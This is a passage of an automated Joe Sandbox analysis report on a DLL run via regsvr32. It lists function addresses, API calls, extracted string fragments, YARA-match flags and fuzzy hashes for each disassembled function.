                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                • String ID:
                                • API String ID: 1239891234-0
                                • Opcode ID: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                • Instruction ID: ff33e713b9b9862e94e2d2fd4ae4d55f0027255630586c455cca821aadc81769
                                • Opcode Fuzzy Hash: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                • Instruction Fuzzy Hash: 7041BE32909BC58AE6B08B14F8443AFB3A1F388355F50522996CD42BA8EB7ED095CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D28900 Relevance: 7.6, APIs: 5, Instructions: 55timethreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2893B
                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2894B
                                • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28963
                                • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2897B
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28998
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                • String ID:
                                • API String ID: 1445889803-0
                                • Opcode ID: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                • Instruction ID: 08a22431f858d3c52821bee646358606f5e13fcd060269a72eebdbe744b14aa1
                                • Opcode Fuzzy Hash: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                • Instruction Fuzzy Hash: 7A21E62160AF0585DAB08B19FC5032E77E0E78DBA5F241235AADD83778EF3DD2948700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018002B368 Relevance: 7.1, Strings: 5, Instructions: 879COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Fg$UE;~$ibq$X$o
                                • API String ID: 0-4038568857
                                • Opcode ID: 478ae4c756925d4c0df58bf132ef81c61d708642842f5bb4a6db73d18922ca94
                                • Instruction ID: c65d31d342ee38981127283826f07a965cef744f0e08d64225b30ad95669dc15
                                • Opcode Fuzzy Hash: 478ae4c756925d4c0df58bf132ef81c61d708642842f5bb4a6db73d18922ca94
                                • Instruction Fuzzy Hash: B0A2E9B1E0470C9FCB59CFA8E48A6DEBBF2FB48344F004119E906B7251D7B49919CB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000445C Relevance: 7.1, Strings: 5, Instructions: 813COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !g$!g$-{e$.9Y$7cm
                                • API String ID: 0-3613756181
                                • Opcode ID: 8466a7fe0396b74cedb6887ba44c1057051f2a552123ac4d034c792a786adc4e
                                • Instruction ID: bf5508b14f48093895fd1996fdb0e85e6185e8dd26636c64e6a2ba956b5e503a
                                • Opcode Fuzzy Hash: 8466a7fe0396b74cedb6887ba44c1057051f2a552123ac4d034c792a786adc4e
                                • Instruction Fuzzy Hash: 409231711483CB8BCB78CF54C845BEEBBE1FB84704F10852CE86A8BA51E7B49649DB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800054D8 Relevance: 6.8, Strings: 5, Instructions: 573COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Ol$`P$i($km}&$ttR
                                • API String ID: 0-1254889785
                                • Opcode ID: 9493bf0160dfff7cf218a8f761ba212010c51dc1cc37675f8f08f25cb4825c85
                                • Instruction ID: 987162bd0b035dc474e6baf50d73a519649db35efcc54d1c771acda0ad58d409
                                • Opcode Fuzzy Hash: 9493bf0160dfff7cf218a8f761ba212010c51dc1cc37675f8f08f25cb4825c85
                                • Instruction Fuzzy Hash: 57422870908B488FD769CF79C48965EBBF1FB88748F204A1DE6A297271DB709845CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018001D128 Relevance: 6.5, Strings: 5, Instructions: 249COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: &JS$T'$T'$t7"$wHM
                                • API String ID: 0-3882947952
                                • Opcode ID: e1efb4f73683d5eb84ec2e51f9646df27f06f31a7415d6bac1a400d419ecf411
                                • Instruction ID: 5dfe4264b2e9e46270ab4916ee937e41ce96fb3ef9e59635e1bc08d1b7ce1cf5
                                • Opcode Fuzzy Hash: e1efb4f73683d5eb84ec2e51f9646df27f06f31a7415d6bac1a400d419ecf411
                                • Instruction Fuzzy Hash: C6C1E3B150464DDFCB98CF28D1856DA7BE0FF48318F41822AFC0A9B264D774DA68DB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180023748 Relevance: 6.4, Strings: 5, Instructions: 194COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2T$=+%2$]|m$.s$9=
                                • API String ID: 0-2491194820
                                • Opcode ID: cf9153d85b611db8c4e34f9d3970acb18e39f17aceac1e5b04446b1241c988c8
                                • Instruction ID: b22ad84dfc9a36729601f04a7d34ea20b01e779292d252d1f9b28ced5abbce67
                                • Opcode Fuzzy Hash: cf9153d85b611db8c4e34f9d3970acb18e39f17aceac1e5b04446b1241c988c8
                                • Instruction Fuzzy Hash: AE911570D0978C8FDB99DFE8D046BDEBBB2EB15348F40412DE44AAB298D774550ACB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180002888 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <jG$PXf$]V.$fE$2>
                                • API String ID: 0-2974598014
                                • Opcode ID: bad49f1636925e4aa97c527113884a17b5682b6c71c0135986e4f76ada5c5575
                                • Instruction ID: 93145a700ffc0e4eb939e50d890ad0ed9c26548b847d798d32bc26a6146f6c62
                                • Opcode Fuzzy Hash: bad49f1636925e4aa97c527113884a17b5682b6c71c0135986e4f76ada5c5575
                                • Instruction Fuzzy Hash: 3FA1E9716097C88FDBBADF68C84A7CB7BE4FB49704F50461DD88A8A250CBB45649CB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180026A64 Relevance: 6.4, Strings: 5, Instructions: 132COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: -$<yH$`Zx$i,$i,
                                • API String ID: 0-409805761
                                • Opcode ID: f6182156d312c6874ac13020d1629895101c3b27d9b9d95c05b51086f9e303f4
                                • Instruction ID: e265554e7eca7cf7370185f19b3f513919126148552d798dab9d7d185450bf95
                                • Opcode Fuzzy Hash: f6182156d312c6874ac13020d1629895101c3b27d9b9d95c05b51086f9e303f4
                                • Instruction Fuzzy Hash: 1F511D70E0470ECFCB59CFA8D4956EFBBB6EB44384F00816DD406A6290DB749B59CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000D12C Relevance: 5.6, Strings: 4, Instructions: 633COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: G$B$f F$p1
                                • API String ID: 0-995880848
                                • Opcode ID: f106650fdab1d10f8436c7cd336edd67fd48273b3da7da9a68bf46945136c829
                                • Instruction ID: e5e766d75efbf2695ddd79b534cb997516972fc828d7cc42ecf8557e6a546d15
                                • Opcode Fuzzy Hash: f106650fdab1d10f8436c7cd336edd67fd48273b3da7da9a68bf46945136c829
                                • Instruction Fuzzy Hash: F972F87058478A8FDBB8DF24C8857EF7BA2FB84304F11852DE89A8B250DBB59655CF01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180028D94 Relevance: 5.5, Strings: 4, Instructions: 533COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <!b$[2\$q+|k$qz;
                                • API String ID: 0-4125875841
                                • Opcode ID: 4b7cb7bbd3893869e40255ef41bc2512a7308139999d5a55f5be408d5e599cf0
                                • Instruction ID: a542c4577bd7c2caf4f59e22e2006f44d15bdd166a7528eec1f5ff4567d3e676
                                • Opcode Fuzzy Hash: 4b7cb7bbd3893869e40255ef41bc2512a7308139999d5a55f5be408d5e599cf0
                                • Instruction Fuzzy Hash: 883234716187448FC769DF68C58A65EBBF0FB86744F10891DF6868B2A0C7B2D809CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000BEF0 Relevance: 5.4, Strings: 4, Instructions: 360COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: &$5RX$WE0$\h]
                                • API String ID: 0-3485045178
                                • Opcode ID: 03a43095a46f3f61d774493bb922c9041777d8e7f6728b8083ed9e1489c990f2
                                • Instruction ID: bcdd786ba30a02497e69aa8425991a4f00e6ab9cdb2a577162cf86c9936701da
                                • Opcode Fuzzy Hash: 03a43095a46f3f61d774493bb922c9041777d8e7f6728b8083ed9e1489c990f2
                                • Instruction Fuzzy Hash: 4502E4705187C88BD794DFA8C48A69FFBE1FB94744F104A1DF486862A0DBF4D949CB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180013674 Relevance: 5.3, Strings: 4, Instructions: 329COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: A1$A1$\)$v8
                                • API String ID: 0-2822171287
                                • Opcode ID: 392d2325a62e3d43b495978243ee00a583b670d5214b1fd2fb6c21b80fcb7928
                                • Instruction ID: 6e847e787c057b57acc1c354f394c9b4082fee365cea8ba22b71c11ea9ebc013
                                • Opcode Fuzzy Hash: 392d2325a62e3d43b495978243ee00a583b670d5214b1fd2fb6c21b80fcb7928
                                • Instruction Fuzzy Hash: 40F1EF71904348DBCF9CDF68C88A6DE7FA1FF48394FA05129FA4697250C7759989CB80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800126A8 Relevance: 5.3, Strings: 4, Instructions: 317COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *ECV$;.$;.$pv>&
                                • API String ID: 0-2557916696
                                • Opcode ID: 4cb81f83a04ef04c4b0be031f68b033a83f7e38034b852111fd97ec7dec363fa
                                • Instruction ID: 7999f9c4935295cc2aa309186ca72e602cbe03928e3ff34651e0e21172d74868
                                • Opcode Fuzzy Hash: 4cb81f83a04ef04c4b0be031f68b033a83f7e38034b852111fd97ec7dec363fa
                                • Instruction Fuzzy Hash: 52F1C0B0505609DFCB98CF28C599ADA7BE0FF48348F41812EFC4A9B260D774DA68DB45
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018002D098 Relevance: 5.3, Strings: 4, Instructions: 255COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Hwn$NR'$$fkD$}gK
                                • API String ID: 0-1908897248
                                • Opcode ID: a42200c2a405048015f864ccfe9f3e227c0945315cfa0ff0bef3f4c816ba0cee
                                • Instruction ID: b3495f7b3258c7cfbbaf34d24a151d9f74cd673a76d708f913f7006ffd896b9d
                                • Opcode Fuzzy Hash: a42200c2a405048015f864ccfe9f3e227c0945315cfa0ff0bef3f4c816ba0cee
                                • Instruction Fuzzy Hash: 4AE1E6701083C8CBDBFADF64C889BDA7BACFB44708F105519EA0A9E258DB745789CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800184E8 Relevance: 5.2, Strings: 4, Instructions: 250COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !vT$3P$?gs $Y^u
                                • API String ID: 0-3532888945
                                • Opcode ID: b61af7194893f8c82987b2510d64685971d92872f6245166d2af23a9bb7efed9
                                • Instruction ID: a130400614884e80b8bc041bf9d1a61bd98fb93a976fe1395b57ea9810b4de45
                                • Opcode Fuzzy Hash: b61af7194893f8c82987b2510d64685971d92872f6245166d2af23a9bb7efed9
                                • Instruction Fuzzy Hash: 72C1207160170DCBDBA8CF28C18A6CE3BE5FF48354F104129FC1A9A261D7B4EA59DB45
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800243F4 Relevance: 5.2, Strings: 4, Instructions: 240COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: -,$7k A$k$2s
                                • API String ID: 0-3102563331
                                • Opcode ID: 21b97ee769df899699db8ec55527806a56553d5edd7851697391367575400d1c
                                • Instruction ID: bac349e1162b647475c44c7bb34b04b6f4b8289c4e67fa9b2355cb93066e8c6e
                                • Opcode Fuzzy Hash: 21b97ee769df899699db8ec55527806a56553d5edd7851697391367575400d1c
                                • Instruction Fuzzy Hash: 36C1387151074D9BCF89DF28C88A5DD3BB1FB48398F566219FC4AA6260C7B4D584CF84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180020F44 Relevance: 5.2, Strings: 4, Instructions: 202COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 76N$Ho<$]}$s5xe
                                • API String ID: 0-3382501871
                                • Opcode ID: 48f959005062580ac36a5c68606ec558c6a5f2e613880a1e5b76a83967194bde
                                • Instruction ID: 0065c1d241d3448e2397ca8c0fa5a5365e82301828f7e764778ef267285b4530
                                • Opcode Fuzzy Hash: 48f959005062580ac36a5c68606ec558c6a5f2e613880a1e5b76a83967194bde
                                • Instruction Fuzzy Hash: 47A1E171504349CFCB95DF28C089ACA7BE0FF58308F42562AFC49A7255D774DAA8CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018001CD44 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: <~]$@:$]U$]U
                                • API String ID: 0-740249671
                                • Opcode ID: f6acb40b154dde8fa3df42201c69f340e4f140856c7e7667b8c968f76e5b3c44
                                • Instruction ID: 93bbccedb30105693727df547a8ee70240eea560fa1b67170d45bbd81435be64
                                • Opcode Fuzzy Hash: f6acb40b154dde8fa3df42201c69f340e4f140856c7e7667b8c968f76e5b3c44
                                • Instruction Fuzzy Hash: BC81387450660DCFDB69DF68D0867EE77F2FB24344F204029E815DA2A2D774CA19CB8A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D25E01 Relevance: 5.2, Strings: 4, Instructions: 178COMMON
                                Download Yara Rule
                                Strings
                                • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID:
                                • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
                                • API String ID: 0-1867057952
                                • Opcode ID: ea889a4d0a0d63da2a4932dba4f80fda51d0f679e8992708aed7b5cf259d3687
                                • Instruction ID: 816e6155049e65d920809caa47ac9e1d3897b88b3389a19d13bb62d5438e95d4
                                • Opcode Fuzzy Hash: ea889a4d0a0d63da2a4932dba4f80fda51d0f679e8992708aed7b5cf259d3687
                                • Instruction Fuzzy Hash: E2810D36A18B4586DB94CF59E49072EB7A0F3C4794F610526EACD87BA8DBBED441CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180022358 Relevance: 5.2, Strings: 4, Instructions: 163COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: U!t$)$o}$q
                                • API String ID: 0-3686089749
                                • Opcode ID: bf0474be6c6ce2e48f6d2d7926dbfb2caa288b201239c410f95da0c70b98d83b
                                • Instruction ID: 504cee08a43b26f7e4edd141fcc1dad3608ee18550f5ec8ccdea89eebec808be
                                • Opcode Fuzzy Hash: bf0474be6c6ce2e48f6d2d7926dbfb2caa288b201239c410f95da0c70b98d83b
                                • Instruction Fuzzy Hash: 74918CB190030E8FCB48CF68D58A5DE7FB1FB68398F204219F85696254D77496A5CFC4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180003050 Relevance: 5.2, Strings: 4, Instructions: 159COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 4<$4<$Hhr$J;}
                                • API String ID: 0-2050331814
                                • Opcode ID: c5a04ea52945682b476d42612895679d50d29c6124b176cb0c2b711214be2d9b
                                • Instruction ID: 3d3ba58424421bda00612f90d71964148b60402fac749f980543760ede98840e
                                • Opcode Fuzzy Hash: c5a04ea52945682b476d42612895679d50d29c6124b176cb0c2b711214be2d9b
                                • Instruction Fuzzy Hash: 7461F4B0615648DFDF58DF68C08A69A7BA1FB48354F00C12EFC1ADB294DB70DA58CB45
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000EBAC Relevance: 5.2, Strings: 4, Instructions: 153COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ;$;$eQ%$_
                                • API String ID: 0-1753937898
                                • Opcode ID: afea0fbc1d0f044595d14710a3cdc41d7bc72a212051bdcef0ffdf3ac8c4ab3c
                                • Instruction ID: 3574068fecf093fcbc9a635d24f3027655c33c427b378eb3a0ef079df85d540d
                                • Opcode Fuzzy Hash: afea0fbc1d0f044595d14710a3cdc41d7bc72a212051bdcef0ffdf3ac8c4ab3c
                                • Instruction Fuzzy Hash: 868137705003CCABDBFACF28CC997D93BA0FB49354F50822AE94A8E250DF745B499B40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000F048 Relevance: 5.1, Strings: 4, Instructions: 132COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: :U$<;?:${(${(
                                • API String ID: 0-1086306767
                                • Opcode ID: adfd1542a6b862dcbbf80cb55e1091ef2c2665d1724c34312d1a81eba162a757
                                • Instruction ID: ff3a3435717f4ead1b58fb824901535bd9cf299cdf9a7bd1c813f3606ded2d6e
                                • Opcode Fuzzy Hash: adfd1542a6b862dcbbf80cb55e1091ef2c2665d1724c34312d1a81eba162a757
                                • Instruction Fuzzy Hash: 0861E0705187848BD768CF28C18965FBBF0FB8A748F10891EF68686260D7B6D948CB03
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180015DF4 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Oh$h<$t010$|N.
                                • API String ID: 0-2324740333
                                • Opcode ID: 35c0cfe6136cac06300efd424f395a2521218bc7fc47dd603edd05c4400a0958
                                • Instruction ID: 16379aaf1bb4413e0c13418f9d8c18c2bc98b7e827952bd0a9b5f9990c6c03cf
                                • Opcode Fuzzy Hash: 35c0cfe6136cac06300efd424f395a2521218bc7fc47dd603edd05c4400a0958
                                • Instruction Fuzzy Hash: E051B1B090034A8BCF48DF68D48A4DE7FB1FB58398F60461DE85AAA250D37496A4CFC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018002191C Relevance: 4.1, Strings: 3, Instructions: 336COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: GW$V{mu$dF
                                • API String ID: 0-3399639152
                                • Opcode ID: 13f3ce258387fdab81722341723304c211862b24c4b90673b1ab6d5c48b56b4d
                                • Instruction ID: 5d4924119bb90987b6c65e27c55bf51887eeb75551c0c0a5c8140b5b1edb0396
                                • Opcode Fuzzy Hash: 13f3ce258387fdab81722341723304c211862b24c4b90673b1ab6d5c48b56b4d
                                • Instruction Fuzzy Hash: B8F13F71508B888FD7B9CF28D48969EBBF0FB84744F20461EE5A59B270DBB49645CF02
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018002AC4C Relevance: 4.1, Strings: 3, Instructions: 330COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: K:$]w($n S$
                                • API String ID: 0-3322466707
                                • Opcode ID: c1684008171d4e306236772ac743a7b0f928483c20fc59153bd471c66e400ccf
                                • Instruction ID: e698a885d6bb162bf0ff3cac371d937558b4210aa05752a6266eb715b4493fc4
                                • Opcode Fuzzy Hash: c1684008171d4e306236772ac743a7b0f928483c20fc59153bd471c66e400ccf
                                • Instruction Fuzzy Hash: 94F11570D047588BDBA8DFA8C88A6DDBBF0FB48304F60821DD85AAB251DB749949DF40
                                Uniqueness

                                Uniqueness Score: -1.00%

